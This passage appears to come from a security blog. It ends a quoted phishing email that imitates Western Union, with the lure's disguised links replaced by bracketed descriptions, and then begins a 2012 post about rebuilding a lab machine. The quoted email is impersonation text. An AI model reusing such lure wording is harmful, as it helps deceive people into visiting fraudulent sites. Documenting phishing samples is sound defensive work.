If you have any questions, visit us at [LINK TO NON-WESTERN UNION SITE, masked as westernunion [DOT] com]

Thank you for using Western Union!

DO NOT REPLY TO THIS EMAIL. IF YOU HAVE QUESTIONS PLEASE CONTACT US [LINK TO NON-WESTERN UNION SITE]

Tuesday, August 28, 2012

@securityguy23:

Rebuilding my lab box after some hardware decided to unexpectedly go all funky chicken over the weekend without the required change control approvals. . .